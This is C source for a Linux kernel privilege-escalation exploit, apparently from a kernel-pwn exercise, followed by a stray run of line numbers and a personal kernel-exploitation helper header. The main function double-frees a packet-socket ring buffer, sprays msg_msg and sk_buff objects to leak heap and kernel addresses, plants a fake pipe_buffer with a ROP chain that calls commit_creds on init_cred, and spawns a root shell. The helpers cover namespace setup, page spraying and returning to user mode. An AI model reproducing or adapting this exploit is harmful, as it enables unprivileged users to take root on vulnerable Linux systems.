 * requests, four sk_buff spray rounds, pipe spray and address leak, then a
 * fake pipe_buffer whose release hook is triggered by closing the pipes.
 *
 * Helpers such as write_msg/peek_msg/read_msg, build_msg, spray_sk_buff,
 * free_sk_buff, init_socket_array, save_status, bind_core and unshare_setup,
 * as well as SOCKET_NUM, SK_BUFF_NUM and the user_* variables, are not
 * defined in this listing (presumably they come from kernelpwn.h).
 * All hard-coded kernel addresses are specific to this one kernel build.
 */
int main(int argc , char **argv, char **envp)
{
int msqid[MSG_QUEUE_NUM];
int packet_fds[PG_NUM]; /* NOTE(review): never used in this function */
int sk_sockets[SOCKET_NUM][2];
int pipe_fd[PIPE_NUM][2];
int socket_fd;
uint64_t victim_addr;
uint64_t victim_qid; /* NOTE(review): unsigned, yet assigned and compared with -1 below; works through integer conversion */
struct msg_msg *nearby_msg;
struct msg_msg *nearby_msg_prim;
struct pipe_buffer* pipe_buf_ptr;
struct pipe_buf_operations *ops_ptr;
uint64_t *rop_chain;
int rop_idx;
save_status();
bind_core(0);
unshare_setup();

/* Stage 1: TPACKET_V3 RX ring with 0x400/8 blocks of one page each. */
socket_fd = do_alloc_pg_vec(PAGE_SIZE, 0x800, 0x400/8, 0, 1000);

for (int i = 0; i < MSG_QUEUE_NUM; i++){
if ((msqid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) < 0)
err_exit("failed to create msg_queue!");
}

memset(&primary_msg, 0, sizeof(primary_msg));
memset(&secondary_msg, 0, sizeof(secondary_msg));

/* Stage 2: one primary and one secondary message per queue, tagged with MSG_TAG and the queue index. */
for (int i = 0; i < MSG_QUEUE_NUM; i++)
{
*(int *)&primary_msg.mtext[0] = MSG_TAG;
*(int *)&primary_msg.mtext[4] = i;
if (write_msg(msqid[i], &primary_msg, sizeof(primary_msg), PRIMARY_MSG_TYPE) < 0)
err_exit("failed to send primary msg!");

*(int *)&secondary_msg.mtext[0] = MSG_TAG;
*(int *)&secondary_msg.mtext[4] = i;
if (write_msg(msqid[i], &secondary_msg, sizeof(secondary_msg), SECONDARY_MSG_TYPE) < 0)
err_exit("failed to send secondary msg!");

/* First zeroed PACKET_RX_RING request, issued part-way through the spray. */
if (i == 1024){
do_free_first(socket_fd);
}
}

/* Switch to TPACKET_V2 and issue the zeroed PACKET_RX_RING request again. */
do_free_second(socket_fd);

/* Stage 3 (1st sk_buff spray): locate the queue whose secondary message was overwritten. */
init_socket_array(sk_sockets);
puts("[*] spray sk_buff...");
build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t *)"yhellow", *(uint64_t *)"yhellow", VICTIM_MSG_TYPE, SECONDARY_MSG_SIZE, 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

victim_qid = -1;
for (int i = 0; i < MSG_QUEUE_NUM; i++)
{
/* A failing peek marks the queue whose message header was modified. */
if (peek_msg(msqid[i], &secondary_msg, sizeof(secondary_msg), 1) < 0){
printf("[+] victim qid: %d\n", i);
victim_qid = i;
}
}
if (victim_qid == -1)
err_exit("failed to make the UAF in msg queue!");

if (free_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to release sk_buff!");

/* Stage 4 (2nd sk_buff spray): enlarge the fake message size and over-read into the neighbouring secondary message. */
build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t*)"yhellow", *(uint64_t*)"yhellow", VICTIM_MSG_TYPE, 0x1000 - sizeof(struct msg_msg), 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

if (peek_msg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0)
err_exit("failed to read victim msg!");

if (*(int *)&oob_msg.mtext[SECONDARY_MSG_SIZE+0x10] != MSG_TAG){
err_exit("failed to rehit the UAF object!");
}

nearby_msg = (struct msg_msg*)&oob_msg.mtext[(SECONDARY_MSG_SIZE+0x10) - sizeof(struct msg_msg)];
printf("\033[32m\033[1m[+] addr of primary msg of msg nearby victim: \033[0m0x%lx\n", nearby_msg->m_list.prev);

if (free_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to release sk_buff!");

/* Stage 5 (3rd sk_buff spray): use the leaked primary message address (minus 8) as the fake next pointer. */
build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t*)"yhellow", *(uint64_t*)"yhellow", VICTIM_MSG_TYPE, sizeof(oob_msg.mtext), nearby_msg->m_list.prev - 8, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

puts("[*] arbitrary read on primary msg of msg nearby victim");
if (peek_msg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0)
err_exit("failed to read victim msg!");

if (*(int *)&oob_msg.mtext[0x1000] != MSG_TAG)
err_exit("failed to rehit the UAF object!");

/* m_list.next of that primary message minus 0x400 is taken as the UAF object's address. */
nearby_msg_prim = (struct msg_msg*) &oob_msg.mtext[0x1000 - sizeof(struct msg_msg)];
victim_addr = nearby_msg_prim->m_list.next - 0x400;

printf("\033[32m\033[1m[+] addr of msg next to victim: \033[0m0x%lx\n", nearby_msg_prim->m_list.next);
printf("\033[32m\033[1m[+] addr of msg UAF object: \033[0m0x%lx\n", victim_addr);

if (free_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to release sk_buff!");

/* Stage 6 (4th sk_buff spray): fake header whose list pointers are both victim_addr, then a real receive of the victim message. */
memset(fake_secondary_msg, 0, sizeof(fake_secondary_msg));
build_msg((struct msg_msg *)fake_secondary_msg, victim_addr, victim_addr, VICTIM_MSG_TYPE, SECONDARY_MSG_SIZE - sizeof(struct msg_msg), 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

if (read_msg(msqid[victim_qid], &secondary_msg, sizeof(secondary_msg), VICTIM_MSG_TYPE) < 0)
err_exit("failed to receive secondary msg!");

/* Stage 7: create the pipes and write to each one. */
for (int i = 0; i < PIPE_NUM; i++)
{
if (pipe(pipe_fd[i]) < 0)
err_exit("failed to create pipe!");

if (write(pipe_fd[i][1], "yhellow", 8) < 0)
err_exit("failed to write the pipe!");
}

/* Read every sprayed sk_buff back and look for one that now contains a kernel pointer in the ops field. */
pipe_buf_ptr = (struct pipe_buffer *) &fake_secondary_msg;
for (int i = 0; i < SOCKET_NUM; i++)
{
for (int j = 0; j < SK_BUFF_NUM; j++)
{
if (read(sk_sockets[i][1], &fake_secondary_msg,
sizeof(fake_secondary_msg)) < 0)
err_exit("failed to release sk_buff!");

if (pipe_buf_ptr->ops > 0xffffffff81000000){
print_hex(pipe_buf_ptr,sizeof(struct pipe_buffer));
printf("\033[32m\033[1m[+] got anon_pipe_buf_ops: \033[0m%p\n", pipe_buf_ptr->ops);
kernel_offset = (uint64_t)pipe_buf_ptr->ops - 0xffffffff8223d800;
kernel_base = 0xffffffff81000000 + kernel_offset;
memcpy(&secondary_msg,&fake_secondary_msg,sizeof(secondary_msg));
}
}
}

printf("\033[32m\033[1m[+] kernel base: \033[0m0x%lx \033[32m\033[1moffset: \033[0m0x%lx\n", kernel_base, kernel_offset);

/* Stage 8: build the fake pipe_buffer (ops at victim_addr + 0x100) and the return chain at offset 0x20 of the same buffer. */
pipe_buf_ptr = (struct pipe_buffer *) fake_secondary_msg;
pipe_buf_ptr->page = *(uint64_t*) "yhellow";
pipe_buf_ptr->ops = victim_addr + 0x100;

ops_ptr = (struct pipe_buf_operations *) &fake_secondary_msg[0x100];
ops_ptr->release = 0xffffffff8130245e + kernel_offset; // PUSH_RSI_POP_RSP_POP_4VAL_RET

rop_idx = 0;
rop_chain = (uint64_t*) &fake_secondary_msg[0x20];
rop_chain[rop_idx++] = kernel_offset + 0xffffffff8100f530; // pop_rdi_ret
rop_chain[rop_idx++] = kernel_offset + 0xffffffff82889040; // INIT_CRED
rop_chain[rop_idx++] = kernel_offset + 0xffffffff810df150; // COMMIT_CREDS
rop_chain[rop_idx++] = kernel_offset + 0xffffffff81e00fb0+22; // SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + 22;
rop_chain[rop_idx++] = *(uint64_t*) "yhellow";
rop_chain[rop_idx++] = *(uint64_t*) "yhellow";
rop_chain[rop_idx++] = get_root_shell;
rop_chain[rop_idx++] = user_cs;
rop_chain[rop_idx++] = user_rflags;
rop_chain[rop_idx++] = user_sp;
rop_chain[rop_idx++] = user_ss;

if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

// for gdb attach only
/* NOTE(review): %p is given an integer expression here, not a pointer */
printf("[*] gadget: %p\n", kernel_offset + 0xffffffff8130245e);
sleep(5);

/* Closing the pipes is what invokes the (now fake) release hook. */
puts("[*] trigger fake ops->release to hijack RIP...");
for (int i = 0; i < PIPE_NUM; i++)
{
close(pipe_fd[i][0]);
close(pipe_fd[i][1]);
}

return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
/**
* @file kernel.h
* @author arttnba3 (arttnba@gmail.com)
* @brief arttnba3's personal utils for kernel pwn
* @version 1.1
* @date 2023-05-20
*
* @copyright Copyright (c) 2023 arttnba3
*
*/
#ifndef A3_KERNEL_PWN_H
#define A3_KERNEL_PWN_H

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <sys/types.h>
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/wait.h>
#include <semaphore.h>
#include <poll.h>
#include <sched.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>

/**
* I - fundamental functions
* e.g. CPU-core binder, user-status saver, etc.
*/

/*
 * Kernel layout bookkeeping shared by the helpers below.
 * The initial values are presumably the no-KASLR defaults of x86-64 --
 * the exploit is expected to overwrite them once real addresses leak.
 */
uint64_t kernel_base = 0xffffffff81000000;
uint64_t kernel_offset = 0;
uint64_t page_offset_base = 0xffff888000000000;
uint64_t vmemmap_base = 0xffffea0000000000;
uint64_t init_task;
uint64_t init_nsproxy;
uint64_t init_cred;

/**
 * @brief translate a direct-mapping address into an address inside vmemmap
 *
 * The address is rounded down to a 0x1000 boundary, turned into a page index
 * relative to `page_offset_base`, and scaled by 0x40 (presumably
 * sizeof(struct page) on the target kernel -- confirm) from `vmemmap_base`.
 *
 * @param direct_map_addr address inside the direct mapping area
 * @return size_t vmemmap_base + index * 0x40
 */
size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
    size_t page_start = direct_map_addr & (~0xfff);
    size_t page_idx = (page_start - page_offset_base) / 0x1000;

    return vmemmap_base + page_idx * 0x40;
}

/**
 * @brief dump a buffer as rows of 8 bytes, each followed by the same 8 bytes
 * read as one native-endian 64-bit word
 *
 * @param p buffer to dump
 * @param size number of bytes to dump, must be a multiple of 8
 * @return int 0 on success, 1 if `size` is not a multiple of 8 (nothing is
 * printed in that case)
 */
int print_hex(void *p, int size)
{
    /* every row prints exactly 8 bytes, so the stride is fixed at 8 too */
    enum { ROW_BYTES = 8 };
    const unsigned char *buf = (const unsigned char *)p;
    int i;

    if (size % ROW_BYTES) {
        return 1;
    }

    printf("--------------------------------------------------------------------------------\n");
    for (i = 0; i < size; i += ROW_BYTES) {
        uint64_t word;

        /* memcpy instead of a pointer cast: `p` may be unaligned */
        memcpy(&word, &buf[i], sizeof(word));
        printf("0x%04x : %02X %02X %02X %02X %02X %02X %02X %02X 0x%llx\n",
               (unsigned int)i, buf[i+0], buf[i+1], buf[i+2], buf[i+3],
               buf[i+4], buf[i+5], buf[i+6], buf[i+7],
               (unsigned long long)word);
    }

    return 0;
}

/**
 * @brief report a fatal error and terminate the process
 *
 * Prints `msg` behind a red "[x] Error at:" banner, sleeps for 5 seconds and
 * exits with EXIT_FAILURE. Never returns.
 *
 * @param msg text describing where the failure happened
 */
void err_exit(char *msg)
{
    const unsigned int grace_seconds = 5;

    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(grace_seconds);
    exit(EXIT_FAILURE);
}

/**
 * @brief check whether we are root and, if so, spawn a shell
 *
 * If getuid() is 0, runs "/bin/sh" through system() and exits with
 * EXIT_SUCCESS when the shell returns. Otherwise prints a failure banner,
 * sleeps for 5 seconds and exits with EXIT_FAILURE. Never returns.
 */
void get_root_shell(void)
{
    puts("[*] Checking for root...");

    if (getuid() == 0) {
        puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
        puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

        system("/bin/sh");

        /* leave through exit() rather than returning to the caller */
        exit(EXIT_SUCCESS);
    }

    puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
    sleep(5);
    exit(EXIT_FAILURE);
}

/*
 * Userspace status saver.
 *
 * Stores the current cs, ss, rsp and rflags into the globals below.
 * NOTE(review): the values are presumably meant for building a return-to-user
 * frame later -- confirm against the callers.
 */
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
/*
 * The operands are written destination-first (Intel order), so this
 * presumably requires building with -masm=intel -- TODO confirm.
 * The asm statement declares no outputs or clobbers; the globals are
 * referenced by symbol name directly.
 */
asm volatile (
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
/* rflags cannot be moved directly: push it, then pop into the global */
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

/**
 * @brief pin the calling process to a single CPU core
 *
 * Builds an affinity mask containing only `core` and applies it with
 * sched_setaffinity(). On failure the reason is reported through perror()
 * and the function returns without printing the success banner; the process
 * is not terminated.
 *
 * @param core index of the CPU core to bind to
 */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);

    /* only claim success when the kernel actually accepted the mask */
    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) < 0) {
        perror("[x] sched_setaffinity");
        return;
    }

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

/**
 * @brief ret2usr helper: call commit_creds(prepare_kernel_cred(NULL))
 *
 * Both arguments are raw addresses that are cast to function pointers and
 * called directly.
 *
 * @param prepare_kernel_cred address of a `void *f(void *)` function
 * @param commit_creds address of an `int f(void *)` function
 */
void get_root_privilige(size_t prepare_kernel_cred, size_t commit_creds)
{
    typedef void *(*prepare_fn)(void *);
    typedef int (*commit_fn)(void *);

    prepare_fn make_cred = (prepare_fn) prepare_kernel_cred;
    commit_fn install_cred = (commit_fn) commit_creds;
    void *new_cred = make_cred(NULL);

    install_cred(new_cred);
}

/* Write `text` to the existing file `path`; returns 0 on success, -1 otherwise. */
static int unshare_write_file(const char *path, const char *text)
{
    size_t len = strlen(text);
    ssize_t written;
    int fd;

    fd = open(path, O_WRONLY);
    if (fd < 0) {
        return -1;
    }

    written = write(fd, text, len);
    close(fd);

    return (written == (ssize_t)len) ? 0 : -1;
}

/**
 * @brief create an isolated namespace
 * note that the caller **SHOULD NOT** be used to get the root, but only as an
 * operator that performs basic exploiting operations inside the namespace
 *
 * Unshares the mount, user and network namespaces, then maps the caller's
 * original uid/gid to 0 inside the new user namespace. Failures are reported
 * through perror() and are not fatal.
 */
void unshare_setup(void)
{
    char edit[0x100];
    /*
     * Sample the IDs BEFORE unshare(): once inside the new user namespace
     * and before any mapping exists, getuid()/getgid() return the overflow
     * ID, and a map line built from it is rejected by the kernel.
     */
    const uid_t outer_uid = getuid();
    const gid_t outer_gid = getgid();

    if (unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET) < 0) {
        perror("[x] unshare");
        return;
    }

    /* setgroups must be denied before an unprivileged gid_map write */
    if (unshare_write_file("/proc/self/setgroups", "deny") < 0) {
        perror("[x] write /proc/self/setgroups");
    }

    snprintf(edit, sizeof(edit), "0 %d 1", (int)outer_uid);
    if (unshare_write_file("/proc/self/uid_map", edit) < 0) {
        perror("[x] write /proc/self/uid_map");
    }

    snprintf(edit, sizeof(edit), "0 %d 1", (int)outer_gid);
    if (unshare_write_file("/proc/self/gid_map", edit) < 0) {
        perror("[x] write /proc/self/gid_map");
    }
}

/**
 * II - fundamental kernel structures
 * e.g. list_head
 */

/*
 * Userspace stand-in for a doubly linked list node: both links are stored as
 * raw 64-bit values instead of pointers.
 */
struct list_head {
uint64_t next; /* address of the next node */
uint64_t prev; /* address of the previous node */
};

/**
 * III - pgv pages sprayer related
 * note that we should create two processes:
 * - the parent is the one that sends commands and gets root
 * - the child creates an isolated namespace by calling unshare_setup(),
 *   then only receives commands from the parent and executes them
 */
/* number of slots in the child's socket-fd table (see spray_cmd_handler()) */
#define PGV_PAGE_NUM 1000
/* setsockopt() option names used on the packet sockets below */
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

/* each allocation is (size * nr) bytes, aligned to PAGE_SIZE */
struct pgv_page_request {
int idx; /* slot in the child's socket-fd table */
int cmd; /* one of the CMD_* values below */
unsigned int size; /* block size, forwarded as tp_block_size */
unsigned int nr; /* block count, forwarded as tp_block_nr */
};

/* operations type */
enum {
CMD_ALLOC_PAGE,
CMD_FREE_PAGE,
CMD_EXIT,
};

/* pipes for cmd communication: requests go parent -> child, replies child -> parent */
int cmd_pipe_req[2], cmd_pipe_reply[2];

/* create a socket and alloc pages, return the socket fd */
int create_socket_and_alloc_pages(unsigned int size, unsigned int nr)
{
/* tpacket version for setsockopt */
struct tpacket_req req;
int socket_fd, version;
int ret;

socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
ret = socket_fd;
goto err_out;
}

version = TPACKET_V1;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_VERSION)\n");
goto err_setsockopt;
}

memset(&req, 0, sizeof(req));
req.tp_block_size = size;
req.tp_block_nr = nr;
req.tp_frame_size = 0x1000;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
goto err_setsockopt;
}

return socket_fd;

err_setsockopt:
close(socket_fd);
err_out:
return ret;
}

/**
 * @brief create a TPACKET_V3 packet socket with an RX ring, bound to "lo"
 *
 * Any failure is reported with perror() and terminates the process with
 * exit(1), so a returned value is always a valid fd.
 *
 * Needs <arpa/inet.h> for htons() and <net/if.h> for if_nametoindex().
 *
 * @param block_size tp_block_size of the ring
 * @param frame_size tp_frame_size of the ring
 * @param block_nr tp_block_nr of the ring
 * @param sizeof_priv tp_sizeof_priv of the ring
 * @param timeout tp_retire_blk_tov of the ring
 * @return int the socket fd
 */
int packet_socket_setup(uint32_t block_size, uint32_t frame_size,
                        uint32_t block_nr, uint32_t sizeof_priv, int timeout)
{
    struct tpacket_req3 req3;
    struct sockaddr_ll sa;
    unsigned int lo_index;
    int v = TPACKET_V3;
    int rv;
    int s;

    s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (s < 0) {
        perror("[-] socket (AF_PACKET)");
        exit(1);
    }

    rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
    if (rv < 0) {
        perror("[-] setsockopt (PACKET_VERSION)");
        exit(1);
    }

    memset(&req3, 0, sizeof(req3));
    req3.tp_sizeof_priv = sizeof_priv;
    req3.tp_block_nr = block_nr;
    req3.tp_block_size = block_size;
    req3.tp_frame_size = frame_size;
    req3.tp_frame_nr = (block_size * block_nr) / frame_size;
    req3.tp_retire_blk_tov = timeout;
    req3.tp_feature_req_word = 0;

    rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
    if (rv < 0) {
        perror("[-] setsockopt (PACKET_RX_RING)");
        exit(1);
    }

    /* if_nametoindex() returns 0 on failure; do not bind with that index */
    lo_index = if_nametoindex("lo");
    if (lo_index == 0) {
        perror("[-] if_nametoindex (lo)");
        exit(1);
    }

    /* memset() already zeroes sll_hatype, sll_pkttype and sll_halen */
    memset(&sa, 0, sizeof(sa));
    sa.sll_family = PF_PACKET;
    sa.sll_protocol = htons(ETH_P_ALL);
    sa.sll_ifindex = lo_index;

    rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
    if (rv < 0) {
        perror("[-] bind (AF_PACKET)");
        exit(1);
    }

    return s;
}

/**
 * @brief parent side: ask the spray child to allocate a pgv ring
 *
 * Sends a CMD_ALLOC_PAGE request through `cmd_pipe_req` and waits for the
 * child's reply on `cmd_pipe_reply`.
 *
 * @param idx slot in the child's socket table to store the new socket in
 * @param size block size of the ring
 * @param nr number of blocks of the ring
 * @return int the value replied by the child, or -1 if the request could not
 * be sent or the reply could not be read completely
 */
int alloc_page(int idx, unsigned int size, unsigned int nr)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = CMD_ALLOC_PAGE,
        .size = size,
        .nr = nr,
    };
    int ret = -1;

    if (write(cmd_pipe_req[1], &req, sizeof(req)) != (ssize_t)sizeof(req)) {
        return -1;
    }

    /* a short or failed read must not hand back an uninitialised value */
    if (read(cmd_pipe_reply[0], &ret, sizeof(ret)) != (ssize_t)sizeof(ret)) {
        return -1;
    }

    return ret;
}

/**
 * @brief parent side: ask the spray child to release a pgv ring
 *
 * Sends a CMD_FREE_PAGE request through `cmd_pipe_req` and waits for the
 * child's reply on `cmd_pipe_reply`.
 *
 * @param idx slot in the child's socket table whose socket should be closed
 * @return int the value replied by the child, or -1 if the request could not
 * be sent or the reply could not be read completely
 */
int free_page(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = CMD_FREE_PAGE,
    };
    int ret = -1;

    if (write(cmd_pipe_req[1], &req, sizeof(req)) != (ssize_t)sizeof(req)) {
        return -1;
    }

    /* a short or failed read must not hand back an uninitialised value */
    if (read(cmd_pipe_reply[0], &ret, sizeof(ret)) != (ssize_t)sizeof(ret)) {
        return -1;
    }

    return ret;
}

/**
 * @brief child side: serve page-spray commands coming from the parent
 *
 * Enters an isolated namespace via unshare_setup(), then loops reading
 * `struct pgv_page_request` records from `cmd_pipe_req` and answering each
 * one with an `int` on `cmd_pipe_reply`:
 * - CMD_ALLOC_PAGE: replies the fd (or negative error) of the new ring socket
 * - CMD_FREE_PAGE: replies the result of close() on the slot's socket
 * - CMD_EXIT: replies 0 and returns
 * - anything else, or an out-of-range idx: replies -1
 *
 * Also returns when either pipe can no longer be read or written.
 */
void spray_cmd_handler(void)
{
    struct pgv_page_request req;
    int socket_fd[PGV_PAGE_NUM];
    int ret;

    /* mark every slot empty so a stray CMD_FREE_PAGE closes nothing real */
    for (int i = 0; i < PGV_PAGE_NUM; i++) {
        socket_fd[i] = -1;
    }

    /* create an isolated namespace */
    unshare_setup();

    /* handle requests */
    for (;;) {
        if (read(cmd_pipe_req[0], &req, sizeof(req)) != (ssize_t)sizeof(req)) {
            break;
        }

        ret = -1;

        switch (req.cmd) {
        case CMD_ALLOC_PAGE:
        case CMD_FREE_PAGE:
            /* idx comes from the pipe: never index the table unchecked */
            if (req.idx < 0 || req.idx >= PGV_PAGE_NUM) {
                printf("[x] invalid index: %d\n", req.idx);
                break;
            }

            if (req.cmd == CMD_ALLOC_PAGE) {
                ret = create_socket_and_alloc_pages(req.size, req.nr);
                socket_fd[req.idx] = ret;
            } else {
                ret = close(socket_fd[req.idx]);
                socket_fd[req.idx] = -1;
            }
            break;
        case CMD_EXIT:
            ret = 0;
            break;
        default:
            printf("[x] invalid request: %d\n", req.cmd);
            break;
        }

        if (write(cmd_pipe_reply[1], &ret, sizeof(ret)) != (ssize_t)sizeof(ret)) {
            break;
        }

        if (req.cmd == CMD_EXIT) {
            break;
        }
    }
}

/**
 * @brief init the pgv-exploit subsystem
 *
 * Creates the request/reply pipes and forks the child that runs
 * spray_cmd_handler(). The child never returns from this function: it
 * terminates as soon as the handler finishes, so it cannot fall through into
 * the code the parent runs after this call. A failing pipe() or fork() is
 * fatal (err_exit()).
 */
void prepare_pgv_system(void)
{
    pid_t pid;

    /* pipes for pgv */
    if (pipe(cmd_pipe_req) < 0 || pipe(cmd_pipe_reply) < 0) {
        err_exit("FAILED to create pipes for the pgv system!");
    }

    /* child process for pages spray */
    pid = fork();
    if (pid < 0) {
        err_exit("FAILED to fork the pgv spray process!");
    }

    if (pid == 0) {
        spray_cmd_handler();
        /* _exit(): do not flush stdio buffers inherited from the parent */
        _exit(EXIT_SUCCESS);
    }
}

/**
 * IV - keyctl related
 */

/**
 * MUSL doesn't ship `keyctl.h` either :(
 * Luckily we only need a few macros for exploitation,
 * so defining them directly here is okay :)
 */

#define KEY_SPEC_PROCESS_KEYRING -2 /* - key ID for process-specific keyring */
#define KEYCTL_UPDATE 2 /* update a key */
#define KEYCTL_REVOKE 3 /* revoke a key */
